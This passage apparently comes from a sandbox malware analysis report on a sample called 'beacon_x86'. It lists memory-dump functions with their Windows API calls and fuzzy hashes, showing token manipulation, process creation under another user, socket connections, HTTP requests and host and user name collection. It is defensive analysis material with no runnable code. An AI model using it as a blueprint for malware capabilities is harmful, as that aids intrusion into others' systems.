          • Opcode Fuzzy Hash: d1e9c36001d739648bd5b0540454e30614833800f7c735c264fc3ad004d37dfe
          • Instruction Fuzzy Hash: 7D41197A9041009BDF14DFE4D49AA6B37B9EB88320F7D4055EA06EF381D634DC4287B8
          APIs
          • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00D63227
          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00D6324A
          • GetLastError.KERNEL32 ref: 00D63254
            • Part of subcall function 00D60825: _vwprintf.LIBCMT ref: 00D6082F
            • Part of subcall function 00D60825: _vswprintf_s.LIBCMT ref: 00D60853
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
          • String ID:
          • API String ID: 2004037343-0
          • Opcode ID: 9f86f87c5ae15c194252f1bfe404f2ae1e395c140dd38bd226f374757407943b
          • Instruction ID: f48a8e83ef0a784304218b222b8b5388bcf30a4cd1d0259e0b5ef523995feb60
          • Opcode Fuzzy Hash: 9f86f87c5ae15c194252f1bfe404f2ae1e395c140dd38bd226f374757407943b
          • Instruction Fuzzy Hash: 99111A72900219BBEB119FA9DD45AEFBBBCEF08354F100426F904E6151E635AE0886B6
          APIs
          • CreateProcessAsUserA.ADVAPI32(00D9F8A4,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00D63B75,?), ref: 00D63AA4
            • Part of subcall function 00D63870: _memset.LIBCMT ref: 00D6389E
            • Part of subcall function 00D63870: _memset.LIBCMT ref: 00D638BA
          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00D63B75,?,?), ref: 00D63AF3
          • GetLastError.KERNEL32(?,?,00D68320), ref: 00D63AFD
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateProcess_memset$ErrorLastUser
          • String ID:
          • API String ID: 4202367947-0
          • Opcode ID: 0982fd34417c59dd49dc118b61c43cf33fa052bbbe8de61657e7a272f20c38e9
          • Instruction ID: 7e6f0e59f3316c0ce858a71bda69231b958666f67762f759dd2f86ce17d9c5f8
          • Opcode Fuzzy Hash: 0982fd34417c59dd49dc118b61c43cf33fa052bbbe8de61657e7a272f20c38e9
          • Instruction Fuzzy Hash: 5711FA35110640BFEB325FA6DC48E277BB9EF85B11B28082EF586C1560D7268550EB31
          APIs
          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00D8A094,?,?,?,00D670ED), ref: 00D6D475
          • CheckTokenMembership.ADVAPI32(00000000,?,00D670ED,?,?,?,00D670ED), ref: 00D6D48A
          • FreeSid.ADVAPI32(?,?,?,?,00D670ED), ref: 00D6D49A
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateCheckFreeInitializeMembershipToken
          • String ID:
          • API String ID: 3429775523-0
          • Opcode ID: 1d6f8c9cadea20f816400e59006557ca8d84ccf6ab4b4ccf15bb49df28ab8954
          • Instruction ID: 46fdceb7e08d21928fd7f4995a7b47aeea4566b695badea2ae4f02092e85a38a
          • Opcode Fuzzy Hash: 1d6f8c9cadea20f816400e59006557ca8d84ccf6ab4b4ccf15bb49df28ab8954
          • Instruction Fuzzy Hash: 90011D72D45288FFEB01DBE89C84ADDBFBCAB14204F44449AA501A3245D2706B08DB36
          APIs
          • DeleteProcThreadAttributeList.KERNELBASE(00D6834A), ref: 00D681C8
          • GetProcessHeap.KERNEL32(00000000,00D6834A,?,00D6834A,00000000), ref: 00D681D3
          • HeapFree.KERNEL32(00000000,?,00D6834A,00000000), ref: 00D681DA
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Heap$AttributeDeleteFreeListProcProcessThread
          • String ID:
          • API String ID: 551783810-0
          • Opcode ID: e8dc1fe84768dd7c4b5017b534baf21f3adb7088137c2998dde32ade6aef6991
          • Instruction ID: 57042abf33176543147232374795c4d67c85a0f18c667b872bfd1e8256d85333
          • Opcode Fuzzy Hash: e8dc1fe84768dd7c4b5017b534baf21f3adb7088137c2998dde32ade6aef6991
          • Instruction Fuzzy Hash: E9C00232054348FFEF012FE9EC0DA897F29EB09692F008112F70DC5265CB729554ABB2
          Strings
          Memory Dump Source
          • Source File: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_3_810000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: `Wu$`Wu
          • API String ID: 0-1095923640
          • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction ID: 20e067c38fadd8ed65da47dc8f08a7d2802b7b739fd67f049db6ad5a1c791e0b
          • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction Fuzzy Hash: 5C919B74E01209DFCF08CF89C5909EEBBB1FF49315F248199D816AB315D235AA81CFA6
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 69f878c662c84c756de1d8129119de73835064633f44cc5b8cc2bd9adefc1d0d
          • Instruction ID: c2f0cb761ec17cff96f8be3869eb4dba53266de6543573250203317dd1cbea0d
          • Opcode Fuzzy Hash: 69f878c662c84c756de1d8129119de73835064633f44cc5b8cc2bd9adefc1d0d
          • Instruction Fuzzy Hash: D81281319201598FDB08CF5DD891ABDBBF1EF4A311F44816EE456EB386CA38E611DB60
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 109b8e85eca6f3dc4a9b36f80e273022e8c05d9b1d1f4b328c1160f0ce62a6bb
          • Instruction ID: a59a0fc22ddfc96f205cddbf139fc72cbb10b6f657a9334a222e45671a3b463d
          • Opcode Fuzzy Hash: 109b8e85eca6f3dc4a9b36f80e273022e8c05d9b1d1f4b328c1160f0ce62a6bb
          • Instruction Fuzzy Hash: 0B1240719242598FCB08CF6DD8919BDBBF1EF49300F55816EE496EB382C638E611DB60
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
          • Instruction ID: 63142024dee99eb8ebd9e6e6d5ce4565bb0219feb4c61a6e7e65127a6a8e61aa
          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
          • Instruction Fuzzy Hash: 8ED160B3C0F9F3068775912D416822BEA626FD1A5131FC3E1DCD43F289D62A9E1497E0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
          • Instruction ID: e74cdac42d4d356d687a46b8e05b18258ec989895bfdb940aead44cb54f90989
          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
          • Instruction Fuzzy Hash: B6D17FB3C0E9F30A8735912D455813BEAA2AFD1B5131FC3E19CD43F289D66A9E1097E0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
          • Instruction ID: 1cd25fa238fa83536e2cee0a651a46d03f37c57b0810418b67913f3dd0556d1b
          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
          • Instruction Fuzzy Hash: EAC14FB3C0E9F30A8736912D415822BEA626FD1B5131FC3E19CD43F28AD66A5E1497E0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
          • Instruction ID: d72d78773b4044e77881f7b666d9934736528951c73e52dde7659f6623ab7369
          • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
          • Instruction Fuzzy Hash: 60C150B3D1E9F34A8736912D415813BEE62AFD1B4031FC7A19CD83F289D52A9E1497E0
          Memory Dump Source
          • Source File: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_3_810000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction ID: 17bffd3dcd779d2a06912b834cf7288f37af2964be3f85edffbdc4e419f0ec48
          • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction Fuzzy Hash: 1E919BB4E01209DFCB18CF89C5909EDBBB1FF48315F248199D815AB315D335AA81DFA6
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc
          • String ID:
          • API String ID: 1579825452-0
          • Opcode ID: ae2206f5fdc4e62ddd7248e4019a593939f1677a620b90705fae183fbb4c4367
          • Instruction ID: 72ff2f11026f94b6e7c2b73bcc5123fb980c2a18e3b5267b3406511484b2eb62
          • Opcode Fuzzy Hash: ae2206f5fdc4e62ddd7248e4019a593939f1677a620b90705fae183fbb4c4367
          • Instruction Fuzzy Hash: D6413CB6E00209AFDB14DFA8C881AAEB7B5EF48310F158569E909E7345E774ED05CB60
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 889514d21c04973c4f53551dec79e456587bb55b0ebe03bb6a4b0c62d7c4914a
          • Instruction ID: ef24fa0c7c192093a52d7bf4de30f07dc8bf9996205d8966295a27bae4609557
          • Opcode Fuzzy Hash: 889514d21c04973c4f53551dec79e456587bb55b0ebe03bb6a4b0c62d7c4914a
          • Instruction Fuzzy Hash: 7441A1749201688FCB48CF9EE8908EDBBF2FB4E351B45851AE546B7395C638A910DF34
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _write_multi_char$_write_string$__aulldvrm__cftof
          • String ID: $-$@$g
          • API String ID: 4131014116-2320099971
          • Opcode ID: 09abb725da79724107c97555dae2b3c844d34ba5ec8dfada0ed46c5d5eb82f1e
          • Instruction ID: e374d635a8242bbac06bdebc93a0f79552487a724ecb65f76d84354a9ce1e248
          • Opcode Fuzzy Hash: 09abb725da79724107c97555dae2b3c844d34ba5ec8dfada0ed46c5d5eb82f1e
          • Instruction Fuzzy Hash: 76F1577180522D9ADB309F18CC887EDBBB5EB54328F1882DAD44CA6192E7748FC5CF61
          APIs
          • htonl.WS2_32(?), ref: 00D67B54
          • select.WS2_32(00000000,?,?,?,?), ref: 00D67BB8
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67BD4
          • accept.WS2_32(?,00000000,00000000), ref: 00D67BE9
          • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00D67BFC
            • Part of subcall function 00D67520: _malloc.LIBCMT ref: 00D67527
            • Part of subcall function 00D67520: GetTickCount.KERNEL32 ref: 00D67547
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
            • Part of subcall function 00D6071B: htonl.WS2_32(00000000), ref: 00D60721
            • Part of subcall function 00D60864: _memset.LIBCMT ref: 00D60872
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67C89
          • accept.WS2_32(?,00000000,00000000), ref: 00D67C9B
          • closesocket.WS2_32(?), ref: 00D67DA9
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
          • String ID: d
          • API String ID: 4083423528-2564639436
          • Opcode ID: 0c6a147d60305a2f547b292efb5fee8d09e97c1627469dd1b67b7d1855ad040f
          • Instruction ID: 7b6f05ec95234217fc4f771b1ca73a45e120cb6f074de26abf8d8f47f370173a
          • Opcode Fuzzy Hash: 0c6a147d60305a2f547b292efb5fee8d09e97c1627469dd1b67b7d1855ad040f
          • Instruction Fuzzy Hash: 607128B1C00608EBDB21EFA4CC45AAFBBB8EF44314F1449AAE555E2251E731EA45CF71
          APIs
          • _strlen.LIBCMT ref: 00D7AED1
          • __malloc_crt.LIBCMT ref: 00D7AFDD
            • Part of subcall function 00D8080D: _malloc.LIBCMT ref: 00D80819
            • Part of subcall function 00D8080D: Sleep.KERNEL32(00000000,00000001,?,?,00D79834,00000018,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D8082E
          • __decode_pointer.LIBCMT ref: 00D7B054
          • __decode_pointer.LIBCMT ref: 00D7B083
          • __decode_pointer.LIBCMT ref: 00D7B0A8
          • _write_multi_char.LIBCMT ref: 00D7B323
          • _write_string.LIBCMT ref: 00D7B343
          • _write_multi_char.LIBCMT ref: 00D7B365
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __decode_pointer$_write_multi_char$Sleep__malloc_crt_malloc_strlen_write_string
          • String ID: -$@$g
          • API String ID: 785859804-2189933660
          • Opcode ID: 808e18b60f291b9fdfe502dbf34f99d7ad1d900eb6831da42885eb4605a8ed39
          • Instruction ID: 867de4a000729e71d0075abeb52140f79b60fce9dbf3034e4579c09ac09a38fe
          • Opcode Fuzzy Hash: 808e18b60f291b9fdfe502dbf34f99d7ad1d900eb6831da42885eb4605a8ed39
          • Instruction Fuzzy Hash: 3FC1447180522D9ADB309F18CC887EDBBB5EB54328F1882DAD44CA6152EB758FC5CF61
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __decode_pointer$_write_multi_char$_strlen_write_string
          • String ID: -$@$g
          • API String ID: 4088299054-2189933660
          • Opcode ID: 1ae129bfee6254c9a5e3658857fb8c4933a575d7979b7fdbbc0ef0e7e15a441b
          • Instruction ID: fd3b2b208220292a6b53199d08332862300fa353751a53beff188c9d5c96e156
          • Opcode Fuzzy Hash: 1ae129bfee6254c9a5e3658857fb8c4933a575d7979b7fdbbc0ef0e7e15a441b
          • Instruction Fuzzy Hash: C1C1557180522D9ADF309E18CC887ADBBB5EB54328F1882DAD44CA6152EB758FC5CF61
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __snprintf$_memset$HttpRequest$OpenSendSleep
          • String ID:
          • API String ID: 211597586-0
          • Opcode ID: 9391b8f4c8343b7f261005d4aed2972c0e1366ed12449fac3dc339d81a15aa81
          • Instruction ID: e44ac3938db7a716fc53a53a08ed9f32e139763866e758f66c9455400d855fe2
          • Opcode Fuzzy Hash: 9391b8f4c8343b7f261005d4aed2972c0e1366ed12449fac3dc339d81a15aa81
          • Instruction Fuzzy Hash: 21618272900219AFDB11EFA4DC45EEE7BBDEF05304F0804A6F605E3162EB359A498B75
          APIs
          • _memset.LIBCMT ref: 00D6C17F
            • Part of subcall function 00D6BF6B: _memset.LIBCMT ref: 00D6BFFE
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset
          • String ID: 0-Fw$0.Fw$0/Fw$@CFw$P.Fw$`+Fw$p,Fw$p=Fw
          • API String ID: 2102423945-2233469863
          • Opcode ID: 2a1ddd4c431b777eebf149a5e467cff022968bc0af4edfeb5626e099c1d7a3ef
          • Instruction ID: a3a6c6d33edf21e2f03e9201f63ac6a42c5adfb9ff06de3ac0bdf3e68bb77c96
          • Opcode Fuzzy Hash: 2a1ddd4c431b777eebf149a5e467cff022968bc0af4edfeb5626e099c1d7a3ef
          • Instruction Fuzzy Hash: 8F416D36A291286BC711E629CD42CFA76BCDF46720F4511B3B08DB3252EA749F454EF0
          APIs
          • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00D67975
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67985
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67998
          • gethostbyname.WS2_32(?), ref: 00D679AC
          • htons.WS2_32(?), ref: 00D679BF
          • inet_addr.WS2_32(?), ref: 00D679CB
          • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 00D679E5
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: gethostbynamehtonsinet_addrselectsendto
          • String ID: d
          • API String ID: 3731482772-2564639436
          • Opcode ID: 8962c757f3629a5a2704cd7f586ccc38dc134c70504ce5d8f71504689528daeb
          • Instruction ID: a0b1445368e4dc9736521aab4d4d4c7207b0d648437b7238f7aa6959d930b5c0
          • Opcode Fuzzy Hash: 8962c757f3629a5a2704cd7f586ccc38dc134c70504ce5d8f71504689528daeb
          • Instruction Fuzzy Hash: 8421497290431DABEF11AFA4DC45BEE7BB9EF08310F1000A7EA04E6191E675DA518FA1
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • _memset.LIBCMT ref: 00D6B3CE
            • Part of subcall function 00D6B7BA: _memset.LIBCMT ref: 00D6B8B6
          • _malloc.LIBCMT ref: 00D6B3E1
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D6B3F3
            • Part of subcall function 00D6DA37: _malloc.LIBCMT ref: 00D6DA5E
            • Part of subcall function 00D6DA37: _memset.LIBCMT ref: 00D6DA8C
          • htonl.WS2_32(00000000), ref: 00D6B424
          • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 00D6B495
          • GetComputerNameA.KERNEL32(?,?), ref: 00D6B4C6
          • GetUserNameA.ADVAPI32(?,?), ref: 00D6B4F7
            • Part of subcall function 00D61F1B: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00D61F3F
          • _malloc.LIBCMT ref: 00D6B5CF
          • _memset.LIBCMT ref: 00D6B661
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc_memset$Name$Computer$AllocateHeapSocketUserhtonl
          • String ID:
          • API String ID: 932012179-0
          • Opcode ID: 9832f672541c47644c593ca086c20e1186808bbf93a0e041c8a06648b5b8eedf
          • Instruction ID: 0da9baa8ca7cf8c642e0889820611ca07445d9a374f392e0005e78acf8909f74
          • Opcode Fuzzy Hash: 9832f672541c47644c593ca086c20e1186808bbf93a0e041c8a06648b5b8eedf
          • Instruction Fuzzy Hash: FD8106729083046BD720EB65DC42B6B77E9EF88734F14481BF588DB282DB75D98487B2
          APIs
          • htonl.WS2_32 ref: 00D6D13C
          • htonl.WS2_32(?), ref: 00D6D14C
          • GetLastError.KERNEL32 ref: 00D6D176
          • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 00D6D19A
          • GetLastError.KERNEL32 ref: 00D6D1A4
          • GetLastError.KERNEL32 ref: 00D6D1C9
          • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,00D9F8A4), ref: 00D6D1E8
          • GetLastError.KERNEL32 ref: 00D6D1F2
          • GetLastError.KERNEL32 ref: 00D6D20A
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast$Tokenhtonl$DuplicateOpenProcess
          • String ID:
          • API String ID: 2561675318-0
          • Opcode ID: a83e4c18f7414680c76db74af3855bc361593c60ad1bbc3e0b4eeb6df6ba11eb
          • Instruction ID: 59bbd3a93ed36e2c1db2ae1d9e2cf904a7460eb8959e8b71864cffbf61ad8960
          • Opcode Fuzzy Hash: a83e4c18f7414680c76db74af3855bc361593c60ad1bbc3e0b4eeb6df6ba11eb
          • Instruction Fuzzy Hash: A7319171E00305BBFB206BA5EC49F7A3BAAEF45755F284026F641E6191DAB8C904CB31
          APIs
          • htonl.WS2_32 ref: 00D67767
          • htons.WS2_32(00000000), ref: 00D67778
          • socket.WS2_32(00000002,00000001,00000000), ref: 00D677B1
          • closesocket.WS2_32(00000000), ref: 00D677C0
          • gethostbyname.WS2_32(00000000), ref: 00D677DE
          • htons.WS2_32(?), ref: 00D6780A
          • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00D6781D
          • connect.WS2_32(00000000,?,00000010), ref: 00D6782E
          • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 00D67837
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
          • String ID:
          • API String ID: 3339321253-0
          • Opcode ID: a3718137ab157661c6080e462519ffa6bf1d6850e4e9db199e2e608128c95f74
          • Instruction ID: 67d5ace5a47ceb3261aaad7fc4cf24162d22832c8b426ca2fba37f054ad46662
          • Opcode Fuzzy Hash: a3718137ab157661c6080e462519ffa6bf1d6850e4e9db199e2e608128c95f74
          • Instruction Fuzzy Hash: 8631C5B5D04118ABDB20BBE49C85FBE77ACEF08328F1401A6F944E7142E674CA0587B9
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
          • String ID: @
          • API String ID: 1616349570-2766056989
          • Opcode ID: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
          • Instruction ID: 2f91aa6c44690fe53a7d4d9a4cebfbeb7542b51ecc99335da346757be2dbd23f
          • Opcode Fuzzy Hash: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
          • Instruction Fuzzy Hash: 2D415EB59043019FD700EF29D98565AFBE0FF84354F45893EE888973A1D778E844CB9A
          APIs
          • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00D678B2
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D678C2
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D678D5
          • send.WS2_32(?,00000000,?,00000000), ref: 00D678E9
          • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 00D678F3
          • Sleep.KERNEL32(000003E8), ref: 00D67905
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLastSleepselectsend
          • String ID: d
          • API String ID: 3306477828-2564639436
          • Opcode ID: ce12222cf34cd5084134779d1ae440505b1e9f2f9374ee4098d8f1eebee882c6
          • Instruction ID: 214eccfb405780931273cf4558abeeaf6f791fabf7e28c79aac850a667284a39
          • Opcode Fuzzy Hash: ce12222cf34cd5084134779d1ae440505b1e9f2f9374ee4098d8f1eebee882c6
          • Instruction Fuzzy Hash: 3411907180020CABDB219F64DC85BD977B8EB04314F1005A7E605E21A0D7B59ED18FA0
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: signal
          • String ID:
          • API String ID: 1946981877-0
          • Opcode ID: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
          • Instruction ID: b56ee3113ec50b52d2ebb4f8ab71ee7f336b0eefb9bc163dcadcfca50a5a4408
